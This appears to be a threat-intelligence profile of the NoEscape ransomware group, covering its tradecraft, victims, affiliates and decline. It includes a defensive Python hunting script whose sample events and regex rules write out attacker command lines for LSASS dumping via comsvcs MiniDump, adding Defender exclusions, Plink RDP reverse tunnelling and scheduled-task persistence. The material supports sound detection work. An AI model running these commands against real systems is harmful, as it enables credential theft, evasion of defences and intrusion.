NoEscape
NoEscape is a financially motivated ransomware-as-a-service (RaaS) operation first observed in May 2023 and widely reported as a rebrand or spin-off of Avaddon. It uses double extortion, combining data theft with file encryption, and some reporting notes additional extortion options such as DDoS and spam campaigns and call-center support. The group is described as avoiding targets in the former Soviet Union. Within seven months, NoEscape reportedly listed 145 compromised organizations on its leak site, and one source attributed 4.4% of observed incidents (9 incidents) to the group.

Observed delivery and intrusion methods in the provided content include malicious file downloads and infected email attachments; exploitation of the public-facing Microsoft Exchange ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) leading to webshell deployment; use of PowerShell to add Microsoft Defender exclusions; credential dumping from LSASS; and lateral movement primarily via RDP using valid domain credentials. Additional reported tooling and techniques include Plink to tunnel RDP over SSH, TeamViewer for remote access, MegaSync for exfiltration to Mega, scheduled-task execution via a task named "SystemUpdate," and, in another case, NPPSPY to capture cleartext Exchange credentials, followed by RDP-based lateral movement and likely data exfiltration. One forensic account specifically states that NoEscape performed lateral movement via RDP with a domain admin account.

Victims and claimed victims mentioned in the content include the University of Hawaii, where NoEscape claimed in June 2023 to have stolen 65GB of sensitive data; the International Joint Commission, which NoEscape listed on September 7 and from which it claimed to have stolen 80GB of data; Italian technical consultancy Kreacta; Lithuania's Republican Vilnius Psychiatric Hospital; Taiwanese manufacturer Avertronics; and an October 2023 incident referenced in relation to the Order of Psychologists of the Lombardy Region.

The content also notes unconfirmed monitoring linking NoEscape activity to powerhousenow.com in late 2023. The group's ecosystem relationships in the content include LockBitSupp encouraging NoEscape and ALPHV affiliates in late 2023 to use the LockBit leak site after disruption to rival groups. The content also states that Iranian threat actors have been observed working as affiliates of Russian ransomware gangs including NoEscape, RansomHouse, and ALPHV, and that the FBI observed Iranian actors partnering with NoEscape affiliates and taking a percentage of ransom payments. Separately, Prodaft reporting cited in the content says Mikhail Matveev (Wazawaka) worked as a NoEscape affiliate.

The content indicates NoEscape's operations degraded in late 2023: it had not reported new victims after December 4, 2023, affiliates allegedly accused the operators of an exit scam involving ransom payments worth millions, and the group reportedly took down its leak site and lost affiliate trust. Known alias in the provided content: Avaddon (reported rebrand/spin-off relationship).
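The intrusion chain reported above (IIS worker process spawning a shell after ProxyShell, PowerShell adding Defender exclusions, Plink tunnelling RDP over SSH, a "SystemUpdate" scheduled task, MegaSync, LSASS dumping, and RDP logons with a domain admin account) is concrete enough to hunt for. The block below is an added example, not code from the original page or from the Mallory platform: it runs one rule per reported technique over constructed endpoint telemetry and then asks which hosts show several of them together. The event shapes (Sysmon Event ID 1 and Security 4624 fields), hostnames, accounts, IPs, command lines, the set of privileged accounts, and the LSASS dump methods (comsvcs MiniDump, procdump) are assumptions; the profile names the techniques but not the exact commands.

```python
"""Hunt for NoEscape-style post-exploitation tradecraft in endpoint telemetry.

Added example; not code from the original page or from Mallory. All events,
hosts, accounts and command lines are constructed for illustration.
"""
import re

# Constructed sample telemetry: one event per reported technique plus benign events.
EVENTS = [
    {"kind": "process", "host": "EXCH01", "user": "NT AUTHORITY\\SYSTEM", "parent": "w3wp.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -nop -c "Add-MpPreference -ExclusionPath C:\\Windows\\Temp"'},
    {"kind": "process", "host": "EXCH01", "user": "CORP\\svc_backup", "parent": "cmd.exe",
     "image": r"C:\Windows\Temp\plink.exe",
     "cmdline": "plink.exe -ssh -N -R 3389:127.0.0.1:3389 tunnel@203.0.113.10 -pw x"},
    {"kind": "process", "host": "FS01", "user": "CORP\\adm_jdoe", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /tn "SystemUpdate" /tr C:\\ProgramData\\upd.exe /sc onlogon /ru SYSTEM'},
    {"kind": "process", "host": "FS01", "user": "CORP\\adm_jdoe", "parent": "explorer.exe",
     "image": r"C:\Users\adm_jdoe\AppData\Local\MEGAsync\MEGAsync.exe", "cmdline": "MEGAsync.exe"},
    {"kind": "process", "host": "DC01", "user": "CORP\\adm_jdoe", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\Temp\\l.dmp full"},
    {"kind": "logon", "host": "DC01", "user": "CORP\\adm_jdoe", "logon_type": 10, "src_ip": "10.0.5.23"},
    {"kind": "logon", "host": "WS-HR-07", "user": "CORP\\jsmith", "logon_type": 10, "src_ip": "10.0.9.4"},
    {"kind": "process", "host": "WS-HR-07", "user": "CORP\\jsmith", "parent": "explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

PRIVILEGED = {"CORP\\adm_jdoe"}   # assumed tier-0 accounts; derive from AD group membership in practice
IIS_WORKERS = {"w3wp.exe"}        # ProxyShell webshells execute under the Exchange IIS worker process
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


# Each rule returns a rule name when the event matches, otherwise None.
def r_webshell_child(e):
    if e["parent"].lower() in IIS_WORKERS and basename(e["image"]) in SHELLS:
        return "iis_worker_spawned_shell"

def r_defender_exclusion(e):
    if basename(e["image"]) in {"powershell.exe", "pwsh.exe"} and \
       re.search(r"add-mppreference\s+-exclusion(path|process|extension)", e["cmdline"], re.I):
        return "defender_exclusion_added"

def r_plink_rdp_tunnel(e):
    # -R/-L port forwarding that mentions 3389: RDP tunnelled over SSH, as reported for this actor.
    if basename(e["image"]) == "plink.exe" and re.search(r"\s-[RL]\s*\S*3389", e["cmdline"]):
        return "plink_rdp_tunnel"

def r_systemupdate_task(e):
    if basename(e["image"]) == "schtasks.exe" and re.search(r"/create\b", e["cmdline"], re.I) \
       and re.search(r'/tn\s+"?systemupdate"?', e["cmdline"], re.I):
        return "scheduled_task_systemupdate"

def r_megasync(e):
    if basename(e["image"]) == "megasync.exe":
        return "megasync_execution"   # weak on its own: MEGAsync has legitimate users

def r_lsass_dump(e):
    # Dump methods are assumptions; the profile reports LSASS dumping but not the tool.
    c = e["cmdline"]
    if re.search(r"comsvcs(\.dll)?.*minidump", c, re.I) or re.search(r"procdump.*\s-ma\s+lsass", c, re.I):
        return "lsass_memory_dump"

def r_privileged_rdp_logon(e):
    if e["logon_type"] == 10 and e["user"] in PRIVILEGED:   # 4624 type 10 = RemoteInteractive (RDP)
        return "privileged_rdp_logon"

PROCESS_RULES = [r_webshell_child, r_defender_exclusion, r_plink_rdp_tunnel,
                 r_systemupdate_task, r_megasync, r_lsass_dump]
LOGON_RULES = [r_privileged_rdp_logon]


def hunt(events):
    """Run every applicable rule over every event; one hit per (event, rule) match."""
    hits = []
    for e in events:
        for rule in (PROCESS_RULES if e["kind"] == "process" else LOGON_RULES):
            name = rule(e)
            if name:
                hits.append({"rule": name, "host": e["host"], "user": e["user"]})
    return hits


def chained_hosts(hits, minimum=2):
    """Hosts where at least `minimum` distinct rules fired. Single hits are weak signals;
    the chain (tunnel + exclusion + dump + privileged RDP) is what the reporting describes."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], set()).add(h["rule"])
    return sorted(host for host, rules in by_host.items() if len(rules) >= minimum)


if __name__ == "__main__":
    for h in hunt(EVENTS):
        print(f"{h['host']:<9} {h['user']:<22} {h['rule']}")
    print("hosts with chained activity:", chained_hosts(hunt(EVENTS)))
```

The threshold in chained_hosts is the useful part: an administrator's RDP logon or a MEGAsync launch is routine on its own, but a host where a Plink reverse tunnel to port 3389, a new Defender exclusion and an LSASS dump appear together matches the RDP-centric chain this profile describes. The w3wp.exe parent check catches the first child process of a ProxyShell webshell; confirming that CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 are patched on Exchange is the preventive counterpart.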
Tradecraft
9 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
1 malware family attributed to this actor across reporting.
Recent activity
16 sources tracked across advisories, community write-ups, and news.
Named as a distinct RaaS program advertised on RAMP.
Claimed responsibility for a prior ransomware-related breach of the University of Hawaii, alleging theft of 65GB of sensitive data.
Ransomware operation referenced as having affiliates that partnered with Iranian actors in profit-sharing arrangements.
Unconfirmed association with suspicious activity involving the Powerhouse domain in late 2023; not publicly attributed as the confirmed actor behind the 2026-disclosed breach.